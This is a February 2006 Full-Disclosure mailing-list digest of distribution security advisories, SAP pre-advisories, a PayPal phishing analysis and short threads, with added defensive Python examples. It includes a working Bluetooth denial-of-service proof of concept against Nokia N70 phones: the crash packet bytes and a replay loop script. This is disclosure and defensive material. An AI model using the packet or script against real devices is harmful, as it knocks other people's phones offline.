[Full-disclosure] [USN-248-1] unzip vulnerability

2006-02-15 Thread Martin Pitt
===
Ubuntu Security Notice USN-248-1  February 13, 2006
unzip vulnerability
CVE-2005-4667
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

unzip

The problem can be corrected by upgrading the affected package to
version 5.51-2ubuntu0.3 (for Ubuntu 4.10), 5.51-2ubuntu1.3 (for Ubuntu
5.04), or 5.52-3ubuntu2.1 (for Ubuntu 5.10).  In general, a standard
system upgrade is sufficient to effect the necessary changes.

Details follow:

A buffer overflow was discovered in the handling of file name
arguments. By tricking a user or automated system into processing a
specially crafted, excessively long file name with unzip, an attacker
could exploit this to execute arbitrary code with the user's
privileges.


Updated packages for Ubuntu 4.10:


Updated packages for Ubuntu 5.04:


Updated packages for Ubuntu 5.10:



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-249-1] xpdf/poppler/kpdf vulnerabilities

2006-02-15 Thread Martin Pitt
===
Ubuntu Security Notice USN-249-1  February 13, 2006
xpdf, poppler, kdegraphics vulnerabilities
CVE-2006-0301
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

kpdf
libpoppler0c2
xpdf-reader
xpdf-utils

The problem can be corrected by upgrading the affected package to
the following versions:

Ubuntu 4.10:
  xpdf:  3.00-8ubuntu1.11

Ubuntu 5.04:
  xpdf:  3.00-11ubuntu3.7
  kpdf:  4:3.4.0-0ubuntu3.4

Ubuntu 5.10:
  libpoppler0c2: 0.4.2-0ubuntu6.6
  kpdf:  4:3.4.3-0ubuntu2.3

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

The splash image handler in xpdf did not check the validity of
coordinates. By tricking a user into opening a specially crafted PDF
file, an attacker could exploit this to trigger a buffer overflow
which could lead to arbitrary code execution with the privileges of
the user.

The poppler library and kpdf also contain xpdf code, and thus are
affected by the same vulnerability.


Updated packages for Ubuntu 4.10:


Updated packages for Ubuntu 5.04:



[Full-disclosure] [USN-250-1] Linux kernel vulnerability

2006-02-15 Thread Martin Pitt
===
Ubuntu Security Notice USN-250-1  February 13, 2006
linux-source-2.6.12 vulnerability
CVE-2006-0454
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

linux-image-2.6.12-10-386
linux-image-2.6.12-10-686
linux-image-2.6.12-10-686-smp
linux-image-2.6.12-10-amd64-generic
linux-image-2.6.12-10-amd64-k8
linux-image-2.6.12-10-amd64-k8-smp
linux-image-2.6.12-10-amd64-xeon
linux-image-2.6.12-10-iseries-smp
linux-image-2.6.12-10-itanium
linux-image-2.6.12-10-itanium-smp
linux-image-2.6.12-10-k7
linux-image-2.6.12-10-k7-smp
linux-image-2.6.12-10-mckinley
linux-image-2.6.12-10-mckinley-smp
linux-image-2.6.12-10-powerpc
linux-image-2.6.12-10-powerpc-smp
linux-image-2.6.12-10-powerpc64-smp
linux-patch-ubuntu-2.6.12

The problem can be corrected by upgrading the affected package to
version 2.6.12-10.28.  You have to restart your computer after a
standard system upgrade to effect the necessary changes.

Details follow:

Herbert Xu discovered a remote Denial of Service vulnerability in the
ICMP packet handler. In some situations a memory allocation was
released twice, which led to memory corruption. A remote attacker
could exploit this to crash the machine.


[Full-disclosure] [ Secuobs - Advisory ] Another kind of DoS on Nokia cell phones

2006-02-15 Thread Infratech Research
[Software affected] Bluetooth Stack on Nokia cell phones

[Version] Nokia N70 and maybe other models

[Impact] Remote Denial of Service, cellular phones begin to be slower and then 
freeze after a short period (within 30 seconds).

[Credits] Pierre Betouin - [EMAIL PROTECTED] -  Bug found with BSS new release 
v0.8 GPL fuzzer (Bluetooth Stack Smasher - Linux) 

BSS could be downloaded on  http://www.secuobs.com/news/15022006-bss_0_8.shtml

[Vendor] notified now

[Original advisory]

http://www.secuobs.com/news/15022006-nokia_n70.shtml#english
http://www.secuobs.com/news/15022006-nokia_n70.shtml#french

[Concept]

L2CAP packets responsible for the crash are:

7D AF 00 00 41 41 41

Where:

Code field 0x7D (1 byte)
Ident field 0xAF (1 byte)
Length field 0x0000 (2 bytes)

0x41 bytes are random padding.


[Proof of Concept]

# l2ping -c 3 00:15:A0:XX:XX:XX

Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...

0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms

0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms

0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms

3 sent, 3 received, 0% loss

# ./loop.sh 00:15:A0:XX:XX:XX

 (.. snip ..)

# l2ping -c 1 00:15:A0:XX:XX:XX

Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...

no response from 00:15:A0:XX:XX:XX id 0

1 sent, 0 received, 100% loss 


[replay_l2cap_packet_nokiaN70.c] could be downloaded on 
http://www.secuobs.com/replay_l2cap_packet_nokiaN70.c

[Loop.sh] as follows : 

#!/bin/bash
# Another Nokia N70 Bluetooth remote Denial of Service
# Pierre BETOUIN [EMAIL PROTECTED]
# Feb 14 11:21:58 GMT+1 2006

echo "Another Nokia N70 Bluetooth remote Denial of Service"
echo "Pierre BETOUIN [EMAIL PROTECTED]"
echo

# Require the target address as the first argument
if (( $# < 1 )); then
    echo "Usage: $0  (uses replay_l2cap_packet_nokiaN70)"
    exit
fi

if [ -x ./replay_l2cap_packet_nokiaN70 ]; then
    echo "Kill this prog with \"killall -9 loop.sh\" in another terminal."
    echo "PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now)"
    echo
    read
    while (( 1 )); do   # Infinite loop, a bit dirty, we must say ;)
        ./replay_l2cap_packet_nokiaN70 $1
    done
else
    echo "You must compile replay_l2cap_packet_nokiaN70 before"
    echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c"
    exit
fi


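The [Concept] section of the advisory above gives the signalling command layout (code, ident, length). The following is an added example, not part of the original post or of BSS: the header checks a receiving stack or a capture-analysis script can apply to such a command. The function name, the finding labels and the two extra samples are assumptions made for illustration, and the payload is assumed to have its basic L2CAP header already removed.

```python
import struct

# Signalling command codes defined for L2CAP in the Bluetooth 1.2/2.0 core
# specifications; a command with any other code should be rejected.
KNOWN_CODES = {
    0x01: "Command Reject", 0x02: "Connection Request",
    0x03: "Connection Response", 0x04: "Configure Request",
    0x05: "Configure Response", 0x06: "Disconnection Request",
    0x07: "Disconnection Response", 0x08: "Echo Request",
    0x09: "Echo Response", 0x0A: "Information Request",
    0x0B: "Information Response",
}

HEADER = struct.Struct("<BBH")  # code, identifier, length (little-endian)


def inspect_signalling_payload(payload: bytes):
    """Walk the commands packed into one signalling-channel payload.

    Returns a list of (offset, finding) tuples. An empty list means every
    command had a known code, a non-zero identifier and a length that fits
    the data actually present.
    """
    findings = []
    offset = 0
    while offset < len(payload):
        remaining = len(payload) - offset
        if remaining < HEADER.size:
            # Too short to be another command header: stray padding.
            findings.append((offset, "trailing-bytes"))
            break
        code, ident, length = HEADER.unpack_from(payload, offset)
        if code not in KNOWN_CODES:
            findings.append((offset, "unknown-code 0x%02X" % code))
        if ident == 0:
            # Identifier 0x00 is reserved and must not be used.
            findings.append((offset, "zero-identifier"))
        body_start = offset + HEADER.size
        if length > len(payload) - body_start:
            # Declared length runs past the end of the received data.
            findings.append((offset, "length-overrun"))
            break
        offset = body_start + length
    return findings


# Bytes quoted in the advisory: code 0x7D, ident 0xAF, length 0, padding.
ADVISORY_PACKET = bytes.fromhex("7DAF0000414141")
# Constructed samples: a well-formed Echo Request and an over-long length.
ECHO_REQUEST = bytes.fromhex("08010400") + b"ping"
OVERRUN = bytes.fromhex("08021000") + b"AA"

if __name__ == "__main__":
    for name, pkt in [("advisory", ADVISORY_PACKET),
                      ("echo", ECHO_REQUEST),
                      ("overrun", OVERRUN)]:
        print(name, inspect_signalling_payload(pkt))
```
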

[Full-disclosure] [SECURITY] [DSA 974-1] New gpdf packages fix denial of service

2006-02-15 Thread Martin Schulze

- --
Debian Security Advisory DSA 974-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
February 15th, 2006 http://www.debian.org/security/faq
- --

Package: gpdf
Vulnerability  : buffer overflows
Problem type   : local (remote)
Debian-specific: no
CVE ID : CVE-2006-0301

SuSE researchers discovered heap overflow errors in xpdf, the Portable
Document Format (PDF) suite, which is also present in gpdf, the GNOME
version of the Portable Document Format viewer, and which can allow
attackers to cause a denial of service by crashing the application or
possibly execute arbitrary code.

The old stable distribution (woody) does not contain gpdf packages.

For the stable distribution (sarge) these problems have been fixed in
version 2.8.2-1.2sarge3.

For the unstable distribution (sid) these problems will be fixed soon.

We recommend that you upgrade your gpdf package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 



  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg


Re: [Full-disclosure] Tracking with etags

2006-02-15 Thread Georgi Guninski
iirc very similar problem was made public several years ago and there 
was online demo.

a solution may be to disable browser cache - stops at least the 
privacy problem between sessions.

-- 
where do you want bill gates to go today?

On Tue, Feb 14, 2006 at 08:23:35AM -0800, Adam Gleave wrote:
> First, sorry if this has been mentioned before. I've searched and
> haven't found any mention, but it seems too obvious to have not
> already been reported.
>
> Basically, client gets etag from server, client sends etag to server
> next time it connects, server can associate client.
>
> Might not sound significant, but if Gmail - for instance - gives
> people Etag's, they - and anyone listening in on the connection - can
> associate unanonymized accounts with anonymized accounts.
>
> I tested this on tor + privoxy and it worked.

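The exchange described in the thread above (the server hands out an ETag, the client returns it on the next connection) and the effect of the suggested mitigation, as an added example that is not part of either post. The class names, the session labels and the proxy-style header filter are assumptions made for illustration; the filter is a variation on "disable browser cache" that drops cache validators before they leave the client.

```python
import secrets


class EtagServer:
    """Constructed model of the server in the post: a unique ETag per new visitor."""

    def __init__(self):
        self.visits = {}  # etag -> session labels the tag was seen with

    def handle(self, request_headers, session_label):
        tag = request_headers.get("If-None-Match")
        if tag in self.visits:
            # The client replayed a tag we issued: the two visits are linked.
            self.visits[tag].append(session_label)
            return 304, {"ETag": tag}
        tag = '"%s"' % secrets.token_hex(8)
        self.visits[tag] = [session_label]
        return 200, {"ETag": tag}

    def linked_sessions(self):
        """Groups of distinct sessions that presented the same ETag."""
        return [sorted(set(v)) for v in self.visits.values() if len(set(v)) > 1]


class Browser:
    """Minimal client that stores validators the way an HTTP cache does."""

    def __init__(self, cache_enabled=True):
        self.cache_enabled = cache_enabled
        self.cache = {}  # url -> etag

    def get(self, server, url, session_label, header_filter=None):
        headers = {}
        if self.cache_enabled and url in self.cache:
            headers["If-None-Match"] = self.cache[url]
        if header_filter is not None:
            headers = header_filter(headers)
        status, response_headers = server.handle(headers, session_label)
        if self.cache_enabled and "ETag" in response_headers:
            self.cache[url] = response_headers["ETag"]
        return status


# Request headers that replay a value previously chosen by the server.
VALIDATOR_HEADERS = {"if-none-match", "if-modified-since", "if-range"}


def strip_validators(headers):
    """Proxy-side mitigation: drop conditional-request validators."""
    return {k: v for k, v in headers.items()
            if k.lower() not in VALIDATOR_HEADERS}


def run(cache_enabled=True, header_filter=None):
    """Same browser visits once directly and once through an anonymizer."""
    server = EtagServer()
    browser = Browser(cache_enabled=cache_enabled)
    url = "http://example.invalid/logo.png"  # constructed URL
    browser.get(server, url, "direct", header_filter)
    browser.get(server, url, "anonymized", header_filter)
    return server.linked_sessions()


if __name__ == "__main__":
    print("default cache:     ", run())
    print("cache disabled:    ", run(cache_enabled=False))
    print("validators removed:", run(header_filter=strip_validators))
```
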

[Full-disclosure] Kadu Remote Denial Of Service Fun

2006-02-15 Thread Piotr Bania


Hi all,

Some little Kadu fun info:
http://www.piotrbania.com/all/adv/kadu-fun.txt

best regards,
pb

--

Piotr Bania - [EMAIL PROTECTED] - 0xCD, 0x19
Fingerprint: 413E 51C7 912E 3D4E A62A  BFA4 1FF6 689F BE43 AC33
http://www.piotrbania.com  - Key ID: 0xBE43AC33


  - The more I learn about men, the more I love dogs.


[Full-disclosure] CYBSEC - Security Pre-Advisory: Arbitrary File Read/Delete in SAP BC

2006-02-15 Thread Leandro Meiners
(The following advisory is also available in PDF format for download at:
http://www.cybsec.com/vuln/CYBSEC_Security_Pre-Advisory_Arbitrary_File_Read_or_Delete_in_SAP_BC.pdf
 )

CYBSEC S.A.
www.cybsec.com

Pre-Advisory Name: Arbitrary File Read/Delete in SAP BC (Business
Connector)

Vulnerability Class: Improper Input Validation

Release Date: 02/15/2006

Affected Applications:  
* SAP BC 4.6
* SAP BC 4.7

Affected Platforms: Platform-Independent

Local / Remote: Remote

Severity: Medium

Author:  Leandro Meiners.

Vendor Status: Confirmed, patch released.

Reference to Vulnerability Disclosure Policy: 
http://www.cybsec.com/vulnerability_policy.pdf

Product Overview:
=

SAP Business Connector (SAP BC) is a middleware application based on B2B
integration server from webMethods. It enables communication between SAP
applications and SAP R/3 and non-SAP applications, by making all SAP
functions accessible to business partners over the Internet as an
XML-based service.
The SAP Business Connector uses the Internet as a communication platform
and XML or HTML as the data format. It integrates non-SAP products by
using an open, non-proprietary technology.
 
Vulnerability Description:
==

SAP BC was found to allow reading and deleting any file from the file
system to which the user that the SAP BC is running as had access. The
vulnerability is present in the Monitoring functionality of the SAP
Adapter. 

Technical Details:
==

Technical details will be released three months after publication of
this pre-advisory. This was agreed upon with SAP to allow their clients
to upgrade affected software prior to the technical knowledge being
publicly available. 

Impact:
===

The Business Connector by default runs as a privileged user
(administrator on the Windows platform and root on *NIX platforms),
which allows ANY file on the File System to be read/deleted.

According to the SAP Business Connector Security Best Practices, the
following strategies are recommended for running the SAP BC in *NIX
environments:
1.  Running as non root user, using a high port.
2.  Running as non root user, using a high port and port remapping to
see the SAP BC in a restricted port.
3.  Running the JVM setuid root.
4.  Running SAP BC as root

If either strategy (1) or (2) was taken the scope of the vulnerability
was mitigated to allowing read/delete access to only the files owned by
the user which the BC was running as. However, if (3) or (4) had been
chosen ANY file on the File System could be read/deleted from the BC.
Moreover, (3) allowed any user of the Operating System to obtain root
since any Java program would be run with root privileges due to a SetUid
Java Virtual Machine.

The SAP Business Connector Security Best Practices has been corrected to
recommend running the BC as a non-root user and using a high-numbered
port or, if supported by the Operating System, giving the user
privileges to open a specific port below 1024 to be used by the BC.

Solutions:
==

SAP released a patch regarding this issue, for versions 4.6 and 4.7 of
SAP BC. Details can be found in SAP note 906401.

Vendor Response:

* 12/06/2005: Initial Vendor Contact.
* 12/07/2005: Technical details for the vulnerabilities sent to vendor.
* 01/20/2006: Solution provided by vendor.
* 02/15/2006: Coordinate release of pre-advisory without technical
details.
* 05/15/2006: Coordinate release of advisory with technical details.

Contact Information:


For more information regarding the vulnerability feel free to contact
the author at lmeinersatcybsec.com. Please bear in mind that technical
details will be disclosed three months after the release of this
pre-advisory, so such questions won't be answered until then. 

For more information regarding CYBSEC: www.cybsec.com



Leandro Meiners
CYBSEC S.A. Security Systems
E-mail: [EMAIL PROTECTED]
Tel/Fax: [54-11] 4382-1600
Web: http://www.cybsec.com
PGP-Key: http://pgp.mit.edu:11371/pks/lookup?search=lmeinersop=index



[Full-disclosure] CYBSEC - Security Pre-Advisory: Phishing Vector in SAP BC

2006-02-15 Thread Leandro Meiners
(The following advisory is also available in PDF format for download at:
http://www.cybsec.com/vuln/CYBSEC_Security_Pre-Advisory_Phishing_Vector_in_SAP_BC.pdf
 )

CYBSEC S.A.
www.cybsec.com

Pre-Advisory Name: Phishing Vector in SAP BC (Business Connector)

Vulnerability Class: Phishing Vector / Improper Input Validation

Release Date: 02/15/2006

Affected Applications:  
* SAP BC Core Fix 7 (and below)

Affected Platforms: Platform-Independent

Local / Remote: Remote

Severity: Low

Author:  Leandro Meiners.

Vendor Status: Confirmed, patch released.

Reference to Vulnerability Disclosure Policy: 
http://www.cybsec.com/vulnerability_policy.pdf

Product Overview:
=

SAP Business Connector (SAP BC) is a middleware application based on B2B
integration server from webMethods. It enables communication between SAP
applications and SAP R/3 and non-SAP applications, by making all SAP
functions accessible to business partners over the Internet as an
XML-based service.
The SAP Business Connector uses the Internet as a communication platform
and XML or HTML as the data format. It integrates non-SAP products by
using an open, non-proprietary technology.
 
Vulnerability Description:
==

SAP BC was found to provide a vector to allow Phishing scams against the
SAP BC administrator.

Technical Details:
==

Technical details will be released three months after publication of
this pre-advisory. This was agreed upon with SAP to allow their clients
to upgrade affected software prior to the technical knowledge being
publicly available. 

Impact:
===

This can be used to mount a Phishing scam by sending a link, that if
clicked by the administrator (while logged in, or logs in after
clicking) will load the attacker's site webpage inside an HTML frame.

Solutions:
==

SAP released a patch regarding this issue, which requires Server Core
Fix 7. Details can be found in SAP note 908349.

Vendor Response:


* 12/06/2005: Initial Vendor Contact.
* 12/07/2005: Technical details for the vulnerabilities sent to vendor.
* 12/19/2005: Solutions provided by vendor.
* 02/15/2006: Coordinate release of pre-advisory without technical
details.
* 05/15/2006: Coordinate release of advisory with technical details.

Contact Information:


For more information regarding the vulnerability feel free to contact
the author at lmeinersatcybsec.com. Please bear in mind that technical
details will be disclosed three months after the release of this
pre-advisory, so such questions won't be answered until then. 

For more information regarding CYBSEC: www.cybsec.com



Leandro Meiners
CYBSEC S.A. Security Systems
E-mail: [EMAIL PROTECTED]
Tel/Fax: [54-11] 4382-1600
Web: http://www.cybsec.com
PGP-Key: http://pgp.mit.edu:11371/pks/lookup?search=lmeinersop=index



Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge

2006-02-15 Thread Simon Smith
Gee,
I wonder how much money iDefense is going to make from this?

-simon

[EMAIL PROTECTED] wrote:
> iDefense Labs is pleased to announce the launch of our quarterly hacking
> challenge. Going forward, on a quarterly basis, we will select a new
> focus for the challenge and outline the rules for vulnerability
> discoveries that will qualify for the monetary rewards.
>
> For the current quarter, iDefense Labs will pay $10,000 for each
> vulnerability submission that results in the publication of a Microsoft
> Security Bulletin with a severity rating of critical. In order to
> qualify, the submission must be received by midnight EST on March 31,
> 2006. The $10,000 prizes will be paid out following the publication of
> the Microsoft Security Bulletin and will be paid in addition to any
> amount paid for the vulnerability when it is initially accepted.
>
> Further details on the iDefense Vulnerability Contributor Program (VCP)
> can be found at:
>
> http://labs.idefense.com/vcp.php
>
> Further information about iDefense Labs, including access to open source
> tools can be found at:
>
> http://labs.idefense.com
>
> Michael Sutton
> Director, iDefense Labs



Re: [Full-disclosure] CYBSEC - Security Pre-Advisory: Arbitrary File Read/Delete in SAP BC

2006-02-15 Thread KF (lists)
That's probably not a good idea...
You could end up with a situation like this: 
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=324

-KF


3.  Running the JVM setuid root.

 





Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge

2006-02-15 Thread [EMAIL PROTECTED]
zdi is step up to ;]

Simon Smith wrote:
> Gee,
> I wonder how much money iDefense is going to make from this?
>
> -simon
>
> [EMAIL PROTECTED] wrote:
>> iDefense Labs is pleased to announce the launch of our quarterly hacking
>> challenge. Going forward, on a quarterly basis, we will select a new
>> focus for the challenge and outline the rules for vulnerability
>> discoveries that will qualify for the monetary rewards.
>>
>> For the current quarter, iDefense Labs will pay $10,000 for each
>> vulnerability submission that results in the publication of a Microsoft
>> Security Bulletin with a severity rating of critical. In order to
>> qualify, the submission must be received by midnight EST on March 31,
>> 2006. The $10,000 prizes will be paid out following the publication of
>> the Microsoft Security Bulletin and will be paid in addition to any
>> amount paid for the vulnerability when it is initially accepted.
>>
>> Further details on the iDefense Vulnerability Contributor Program (VCP)
>> can be found at:
>>
>> http://labs.idefense.com/vcp.php
>>
>> Further information about iDefense Labs, including access to open source
>> tools can be found at:
>>
>> http://labs.idefense.com
>>
>> Michael Sutton
>> Director, iDefense Labs


[Full-disclosure] [SECURITY] [DSA 975-1] New nfs-user-server packages fix arbitrary code execution

2006-02-15 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 975-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
February 15th, 2006 http://www.debian.org/security/faq
- --

Package: nfs-user-server
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-0043
Debian Bug : 350020

Marcus Meissner discovered that attackers can trigger a buffer overflow
in the path handling code by creating or abusing existing symlinks, which
may lead to the execution of arbitrary code.

This vulnerability isn't present in the kernel NFS server.

This update includes a bugfix for attribute handling of symlinks. This
fix does not have security implications, but at the time when this DSA
was prepared it was already queued for the next stable point release, so
we decided to include it beforehand.

For the old stable distribution (woody) this problem has been fixed in
version 2.2beta47-12woody1.

For the stable distribution (sarge) this problem has been fixed in
version 2.2beta47-20sarge2.

For the unstable distribution (sid) this problem has been fixed in
version 2.2beta47-22.

We recommend that you upgrade your nfs-user-server package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 



[Full-disclosure] Forensic Analysis of a Paypal Phishing Scam

2006-02-15 Thread Babak Pasdar

Hello all,

I recently received this e-mail notifying me of a new e-mail address
that was added to my Paypal account.  I broke down the steps I took to
analyze the e-mail first to identify that it was a phishing scam and
then to track down the steps this Scammer used and identify the systems
in use.  

I have provided the e-mail and a synopsis along with a link to the
original full forensics.

Synopsis:  
1. The e-mail was sent from a Comcast network in Indianapolis from a
Windows machine running Outlook Express.  The Scammer used a Yahoo name
on the account.

2. The domain was registered through a proxy domain registration company
which uses Yahoo's DNS and provided a web server through Yahoo.

3. The Yahoo web server redirects the user to an Oracle web server on
port 84 running in Seoul, Korea.

4. Finally, when you put in your username and password it tells you the
system is down for maintenance, but does take the time to ask you for
your credit card and pin numbers! 

Notes: The Scammer does use an interesting approach in eliminating the
address bar and using a graphic of an address bar in its place showing
a Paypal login account.

To see the full analysis click here:
http://dsb.igxglobal.com/plugins/content/content.php?content.37


Babak Pasdar
Founder / Chief Technology & Information Security Officer

Support the Daily Security Briefing Web Site and Register Here:
http://dsb.igxglobal.com

For this week's DSB/Week-in-Review Audio/Video Security Report:
http://dsb.igxglobal.com/news.php?item.50.4

To register for a Daily Security Intelligence e-mail:
http://www.igxglobal.com/dsb/register.html

Get your security news via Podcast:
http://dsb.igxglobal.com/page.php?11



Return-Path: [EMAIL PROTECTED]
Received: from groupware.igxglobal.com ([unix socket]) by groupware
(Cyrus v2.1.16) with LMTP; Tue, 14 Feb 2006 11:48:09 -0500
X-Sieve: CMU Sieve 2.2
Received: from mail5.igxglobal.com (unknown [192.168.27.51]) by
groupware.igxglobal.com (Postfix) with ESMTP id 910DD32C082 for
[EMAIL PROTECTED]; Tue, 14 Feb 2006 11:48:09 -0500 (EST)
Received: from c-68-58-4-141.hsd1.in.comcast.net (HELO compaq)
([68.58.4.141]) by mail5.igxglobal.com with SMTP; 14 Feb 2006 11:48:09
-0500
Message-Id: [EMAIL PROTECTED]
X-BrightmailFiltered: true
X-Brightmail-Tracker: AA==
X-IronPort-AV: i=4.02,114,1139202000;  d=scan'208,217;
a=4072399:sNHT36133904
Reply-To: [EMAIL PROTECTED]
From: PayPal Security [EMAIL PROTECTED]
Subject: New email address added to your account !
Date: Tue, 14 Feb 2006 11:48:06 -0500
MIME-Version: 1.0
Content-Type: text/html; charset=Windows-1251
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.
To: undisclosed-recipients : ;
X-Evolution-Source: imap://bpasdar;[EMAIL PROTECTED]/


You've added an additional email address to your PayPal account.

If you don’t agree with this email [EMAIL PROTECTED] and if you need
assistance with your account, 

please click here to login to your account.

 

To make sure you can use your PayPal account the next time you make a
purchase,

all you need to do is confirm or not your email address. 

If your email program has problems with hypertext links, 

you may also confirm your email address by logging in to your account.

 
Thank you for using PayPal! 

The PayPal Team



Please do not reply to this email. This mailbox is not monitored and you
will not receive a response.

For assistance, log in to your PayPal account and click the Help link
located in the top right corner of any PayPal page. 



PayPal Email ID PP059

HEMFBKCMCUNCRVRFYOEGZWKZKENTMXZBPDSJBD
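
The header reading behind step 1 of the synopsis, as an added example that is not part of the original post: it walks the Received chain quoted above from the recipient's side and reports the first public peer. The flag names, the `brand` parameters and the rule that internal relays use private addresses are assumptions of this example.

```python
import email
import ipaddress
import re

# Headers as quoted in the post (addresses already redacted by the archive).
# Continuation lines are re-indented so they parse as folded headers.
RAW_HEADERS = """\
Return-Path: [EMAIL PROTECTED]
Received: from groupware.igxglobal.com ([unix socket]) by groupware
 (Cyrus v2.1.16) with LMTP; Tue, 14 Feb 2006 11:48:09 -0500
X-Sieve: CMU Sieve 2.2
Received: from mail5.igxglobal.com (unknown [192.168.27.51]) by
 groupware.igxglobal.com (Postfix) with ESMTP id 910DD32C082 for
 [EMAIL PROTECTED]; Tue, 14 Feb 2006 11:48:09 -0500 (EST)
Received: from c-68-58-4-141.hsd1.in.comcast.net (HELO compaq)
 ([68.58.4.141]) by mail5.igxglobal.com with SMTP; 14 Feb 2006 11:48:09
 -0500
Reply-To: [EMAIL PROTECTED]
From: PayPal Security [EMAIL PROTECTED]
Subject: New email address added to your account !
Content-Type: text/html; charset=Windows-1251
X-Mailer: Microsoft Outlook Express 6.00.2600.
To: undisclosed-recipients : ;

"""

IPV4_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_received(value):
    """Split one Received: value into the peer it names and the server that wrote it."""
    flat = " ".join(value.split())              # undo header folding
    peer_part, _, writer_part = flat.partition(" by ")
    name = re.match(r"from (\S+)", peer_part)
    helo = re.search(r"\(HELO ([^)\s]+)\)", peer_part)
    ip = IPV4_IN_BRACKETS.search(peer_part)
    return {
        "from_host": name.group(1) if name else None,
        "helo": helo.group(1) if helo else None,
        "ip": ip.group(1) if ip else None,
        "by_host": writer_part.split()[0] if writer_part else None,
    }


def is_public(ip):
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:                          # malformed octets such as 999.1.1.1
        return False


def external_handoff(msg):
    """Return (hop, hops_below) for the newest hop whose peer address is public.

    Received headers are prepended, so index 0 is the newest. Assumption: the
    recipient's internal relays use private addresses, so the first public peer
    marks where the mail entered the organisation. That hop was written by the
    recipient's own server; anything below it is sender-supplied and forgeable.
    """
    hops = [parse_received(v) for v in msg.get_all("Received", [])]
    for index, hop in enumerate(hops):
        if hop["ip"] and is_public(hop["ip"]):
            return hop, len(hops) - index - 1
    return None, 0


def triage(raw, brand="paypal", brand_domain="paypal.com"):
    """Summarise where the message entered and which header facts look inconsistent."""
    msg = email.message_from_string(raw)
    hop, hops_below = external_handoff(msg)
    mailer = msg.get("X-Mailer", "")
    flags = []
    if hop:
        host = (hop["from_host"] or "").lower()
        on_brand = host == brand_domain or host.endswith("." + brand_domain)
        if brand in msg.get("From", "").lower() and not on_brand:
            flags.append("brand-name-from-unrelated-host")
        if mailer and hops_below == 0:
            # A desktop mail client delivered straight to the recipient's MX,
            # with no sender-side mail server in the path.
            flags.append("desktop-client-direct-to-mx")
        if hop["helo"] and "." not in hop["helo"]:
            flags.append("unqualified-helo")
    return {"origin": hop, "mailer": mailer, "flags": flags}


if __name__ == "__main__":
    report = triage(RAW_HEADERS)
    print(report["origin"], report["mailer"], report["flags"], sep="\n")
```

Reading from the top down matters: a Received line placed below the handoff hop by the sender does not change the reported origin.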




[Full-disclosure] [SECURITY] [DSA 976-1] New libast packages fix arbitrary code execution

2006-02-15 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 976-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
February 15th, 2006 http://www.debian.org/security/faq
- --

Package: libast, libast1
Vulnerability  : buffer overflow
Problem type   : local
Debian-specific: no
CVE ID : CVE-2006-0224

Johnny Mast discovered a buffer overflow in libast, the library of
assorted spiffy things, that can lead to the execution of arbitrary
code.  This library is used by eterm which is installed setgid uid
which leads to a vulnerability to alter the utmp file.

For the old stable distribution (woody) this problem has been fixed in
version 0.4-3woody2.

For the stable distribution (sarge) this problem has been fixed in
version 0.6-0pre2003010606sarge1.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you upgrade your libast packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 


Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge

2006-02-15 Thread Jerome Athias
$50,000 for reporting BSA that your neighbor uses an illegal version of
Window$ !

https://reporting.bsa.org/usa/home.aspx



